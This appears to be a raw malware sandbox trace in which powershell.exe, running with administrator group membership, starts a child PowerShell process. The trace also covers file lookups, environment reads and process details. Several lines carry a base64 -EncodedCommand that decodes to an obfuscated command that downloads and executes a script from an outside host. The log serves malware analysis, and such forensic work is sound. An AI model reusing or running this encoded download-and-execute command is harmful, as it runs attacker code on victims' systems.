	[0356.800] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.JS", lpFindFileData=0x1c79db60 | out: lpFindFileData=0x1c79db60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0356.800] SetErrorMode (uMode=0x1) returned 0x1
	[0356.800] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c79d9c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0356.800] SetErrorMode (uMode=0x1) returned 0x1
	[0356.800] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.JSE", lpFindFileData=0x1c79db60 | out: lpFindFileData=0x1c79db60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0356.800] SetErrorMode (uMode=0x1) returned 0x1
	[0356.801] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c79d9c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0356.801] SetErrorMode (uMode=0x1) returned 0x1
	[0356.801] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.WSF", lpFindFileData=0x1c79db60 | out: lpFindFileData=0x1c79db60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0356.801] SetErrorMode (uMode=0x1) returned 0x1
	[0356.801] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c79d9c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0356.801] SetErrorMode (uMode=0x1) returned 0x1
	[0356.801] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.WSH", lpFindFileData=0x1c79db60 | out: lpFindFileData=0x1c79db60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0356.802] SetErrorMode (uMode=0x1) returned 0x1
	[0356.802] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c79d9c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0356.802] SetErrorMode (uMode=0x1) returned 0x1
	[0356.802] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.MSC", lpFindFileData=0x1c79db60 | out: lpFindFileData=0x1c79db60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0356.802] SetErrorMode (uMode=0x1) returned 0x1
	[0356.802] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c79d9c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0356.803] SetErrorMode (uMode=0x1) returned 0x1
	[0356.803] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell", lpFindFileData=0x1c79db60 | out: lpFindFileData=0x1c79db60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0356.803] SetErrorMode (uMode=0x1) returned 0x1
	[0356.803] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c79d9c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0356.803] SetErrorMode (uMode=0x1) returned 0x1
	[0356.803] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.ps1", lpFindFileData=0x1c79db60 | out: lpFindFileData=0x1c79db60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0356.803] SetErrorMode (uMode=0x1) returned 0x1
	[0356.804] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c79d9c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0356.804] SetErrorMode (uMode=0x1) returned 0x1
	[0356.804] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.psm1", lpFindFileData=0x1c79db60 | out: lpFindFileData=0x1c79db60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0356.804] SetErrorMode (uMode=0x1) returned 0x1
	[0356.804] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c79d9c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0356.804] SetErrorMode (uMode=0x1) returned 0x1
	[0356.804] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.psd1", lpFindFileData=0x1c79db60 | out: lpFindFileData=0x1c79db60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0356.805] SetErrorMode (uMode=0x1) returned 0x1
	[0356.805] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c79d9c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0356.805] SetErrorMode (uMode=0x1) returned 0x1
	[0356.805] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.COM", lpFindFileData=0x1c79db60 | out: lpFindFileData=0x1c79db60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0356.805] SetErrorMode (uMode=0x1) returned 0x1
	[0356.805] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c79d9c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0356.806] SetErrorMode (uMode=0x1) returned 0x1
	[0356.806] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.EXE", lpFindFileData=0x1c79db60 | out: lpFindFileData=0x1c79db60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82dd7f7c, ftCreationTime.dwHighDateTime=0x1ca0414, ftLastAccessTime.dwLowDateTime=0x82dd7f7c, ftLastAccessTime.dwHighDateTime=0x1ca0414, ftLastWriteTime.dwLowDateTime=0xe84fc9b0, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x73a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="powershell.exe", cAlternateFileName="")) returned 0x27c190
	[0356.807] FindNextFileW (in: hFindFile=0x27c190, lpFindFileData=0x1c79db70 | out: lpFindFileData=0x1c79db70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82dd7f7c, ftCreationTime.dwHighDateTime=0x1ca0414, ftLastAccessTime.dwLowDateTime=0x82dd7f7c, ftLastAccessTime.dwHighDateTime=0x1ca0414, ftLastWriteTime.dwLowDateTime=0xe84fc9b0, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x73a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="powershell.exe", cAlternateFileName="")) returned 0
	[0356.807] FindClose (in: hFindFile=0x27c190 | out: hFindFile=0x27c190) returned 1
	[0356.807] SetErrorMode (uMode=0x1) returned 0x1
	[0356.808] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", nBufferLength=0x105, lpBuffer=0x1c79dc80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpFilePart=0x0) returned 0x39
	[0356.808] SetErrorMode (uMode=0x1) returned 0x1
	[0356.808] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"), fInfoLevelId=0x0, lpFileInformation=0x1c79de90 | out: lpFileInformation=0x1c79de90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82dd7f7c, ftCreationTime.dwHighDateTime=0x1ca0414, ftLastAccessTime.dwLowDateTime=0x82dd7f7c, ftLastAccessTime.dwHighDateTime=0x1ca0414, ftLastWriteTime.dwLowDateTime=0xe84fc9b0, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x73a00)) returned 1
	[0356.808] SetErrorMode (uMode=0x1) returned 0x1
	[0356.809] CoTaskMemAlloc (cb=0x104) returned 0x1b90d0
	[0356.809] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b90d0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0356.809] CoTaskMemFree (pv=0x1b90d0) 
	[0356.811] CoTaskMemAlloc (cb=0x104) returned 0x1b90d0
	[0356.811] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b90d0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0356.811] CoTaskMemFree (pv=0x1b90d0) 
	[0356.814] CoTaskMemAlloc (cb=0x104) returned 0x1b90d0
	[0356.814] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b90d0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0356.814] CoTaskMemFree (pv=0x1b90d0) 
	[0356.824] CoTaskMemAlloc (cb=0x104) returned 0x1b90d0
	[0356.824] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b90d0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0356.824] CoTaskMemFree (pv=0x1b90d0) 
	[0356.837] CoTaskMemAlloc (cb=0x3b) returned 0x1b8c6590
	[0356.837] SHGetFileInfoA (in: pszPath="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", dwFileAttributes=0x0, psfi=0x1c79e078, cbFileInfo=0x168, uFlags=0x2000 | out: psfi=0x1c79e078) returned 0x4550
	[0356.981] CoTaskMemFree (pv=0x1b8c6590) 
	[0356.984] GetConsoleWindow () returned 0x10228
	[0356.991] CoTaskMemAlloc (cb=0x104) returned 0x1b90d0
	[0356.991] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b90d0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0356.991] CoTaskMemFree (pv=0x1b90d0) 
	[0356.992] CoTaskMemAlloc (cb=0x104) returned 0x1b90d0
	[0356.992] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x1b90d0, nSize=0x80 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35
	[0356.992] CoTaskMemFree (pv=0x1b90d0) 
	[0356.998] CoTaskMemAlloc (cb=0x104) returned 0x1b90d0
	[0356.998] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x1b90d0, nSize=0x80 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35
	[0356.998] CoTaskMemFree (pv=0x1b90d0) 
	[0357.000] CommandLineToArgvW (in: lpCmdLine=" -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==", pNumArgs=0x1c79e0c0 | out: pNumArgs=0x1c79e0c0) returned 0x1b8ccdc0*=""
	[0357.001] lstrlenW (lpString="-EncodedCommand") returned 15
	[0357.002] CoTaskMemAlloc (cb=0x22) returned 0x1b8d34f0
	[0357.002] RtlMoveMemory (in: Destination=0x1b8d34f0, Source=0x1b8ccde2, Length=0x20 | out: Destination=0x1b8d34f0) 
	[0357.002] CoTaskMemFree (pv=0x1b8d34f0) 
	[0357.002] lstrlenW (lpString="JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==") returned 376
	[0357.002] CoTaskMemAlloc (cb=0x2f4) returned 0x1b8cd100
	[0357.002] RtlMoveMemory (in: Destination=0x1b8cd100, Source=0x1b8cce02, Length=0x2f2 | out: Destination=0x1b8cd100) 
	[0357.003] CoTaskMemFree (pv=0x1b8cd100) 
	[0357.003] LocalFree (hMem=0x1b8ccdc0) returned 0x0
	[0357.004] CoTaskMemAlloc (cb=0x804) returned 0x1b8ccdc0
	[0357.004] GetConsoleTitleW (in: lpConsoleTitle=0x1b8ccdc0, nSize=0x400 | out: lpConsoleTitle="Administrator: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 0x48
	[0357.004] CoTaskMemFree (pv=0x1b8ccdc0) 
	[0357.013] CoTaskMemAlloc (cb=0x38e) returned 0x1b8ccdc0
	[0357.014] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"  -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory="C:\\Windows\\system32", lpStartupInfo=0x1c79e020*(cb=0x68, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x31bd108 | out: lpCommandLine="\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"  -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==", lpProcessInformation=0x31bd108*(hProcess=0x36c, hThread=0x368, dwProcessId=0x8ac, dwThreadId=0x9f0)) returned 1
	[0357.162] CoTaskMemFree (pv=0x1b8ccdc0) 
	[0357.163] CloseHandle (hObject=0x368) returned 1
	[0357.163] CoTaskMemAlloc (cb=0x3b) returned 0x1b8c6590
	[0357.163] SHGetFileInfoA (in: pszPath="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", dwFileAttributes=0x0, psfi=0x1c79e0c8, cbFileInfo=0x168, uFlags=0x2000 | out: psfi=0x1c79e0c8) returned 0x4550
	[0357.164] CoTaskMemFree (pv=0x1b8c6590) 
	[0357.167] GetCurrentProcess () returned 0xffffffffffffffff
	[0357.167] GetCurrentProcess () returned 0xffffffffffffffff
	[0357.167] DuplicateHandle (in: hSourceProcessHandle=0xffffffffffffffff, hSourceHandle=0x36c, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x1c79e1a8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x1c79e1a8*=0x368) returned 1

Process:
	id = "18"
	image_name = "powershell.exe"
	filename = "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"
	page_root = "0x2e9fe000"
	os_pid = "0x618"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "1"
	os_parent_pid = "0xb40"
	cmd_line = "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA=="
	cur_dir = "C:\\Windows\\system32\\"
	os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz"
	bitness = "64"
	os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 106
	os_tid = 0x59c

	[0307.583] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0309.614] SysStringByteLen (bstr="Microsoft.PowerShell.ConsoleHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, ProcessorArchitecture=msil") returned 0xfe
	[0309.615] SysStringByteLen (bstr="Microsoft.PowerShell.ConsoleHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, ProcessorArchitecture=msil") returned 0xfe
	[0309.615] SysStringByteLen (bstr="Microsoft.PowerShell.UnmanagedPSEntry") returned 0x4a
	[0309.615] SysStringByteLen (bstr="Microsoft.PowerShell.UnmanagedPSEntry") returned 0x4a
	[0319.391] GetVersionExW (in: lpVersionInformation=0x10d980*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x10d980*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0319.393] GetVersionExW (in: lpVersionInformation=0x10d980*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x10d980*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0319.400] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10d5a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0319.405] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10d640, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0319.406] GetVersionExW (in: lpVersionInformation=0x10d6f0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x10d6f0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0319.407] SetErrorMode (uMode=0x1) returned 0x1
	[0319.407] GetFileAttributesExW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll"), fInfoLevelId=0x0, lpFileInformation=0x10d850 | out: lpFileInformation=0x10d850*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa85ac0a8, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa85ac0a8, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa85d2208, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x2df000)) returned 1
	[0319.408] SetErrorMode (uMode=0x1) returned 0x1
	[0319.412] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpdwHandle=0x10dac0 | out: lpdwHandle=0x10dac0) returned 0x94c
	[0319.414] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", dwHandle=0x0, dwLen=0x94c, lpData=0x2c572d8 | out: lpData=0x2c572d8) returned 1
	[0319.416] VerQueryValueW (in: pBlock=0x2c572d8, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x10da38, puLen=0x10da30 | out: lplpBuffer=0x10da38*=0x2c57374, puLen=0x10da30) returned 1
	[0319.419] lstrlenW (lpString="䅁") returned 1
	[0319.428] VerQueryValueW (in: pBlock=0x2c572d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0x10d9a8, puLen=0x10d9a0 | out: lplpBuffer=0x10d9a8*=0x2c57450, puLen=0x10d9a0) returned 1
	[0319.803] lstrlenW (lpString="Microsoft Corporation") returned 21
	[0319.806] CoTaskMemAlloc (cb=0x2e) returned 0x3a5a90
	[0319.806] lstrcpyW (in: lpString1=0x3a5a90, lpString2="Microsoft Corporation" | out: lpString1="Microsoft Corporation") returned="Microsoft Corporation"
	[0319.807] CoTaskMemFree (pv=0x3a5a90) 
	[0319.807] VerQueryValueW (in: pBlock=0x2c572d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0x10d9a8, puLen=0x10d9a0 | out: lplpBuffer=0x10d9a8*=0x2c574a4, puLen=0x10d9a0) returned 1
	[0319.807] lstrlenW (lpString="System.Management.Automation") returned 28
	[0319.807] CoTaskMemAlloc (cb=0x3c) returned 0x324c40
	[0319.807] lstrcpyW (in: lpString1=0x324c40, lpString2="System.Management.Automation" | out: lpString1="System.Management.Automation") returned="System.Management.Automation"
	[0319.807] CoTaskMemFree (pv=0x324c40) 
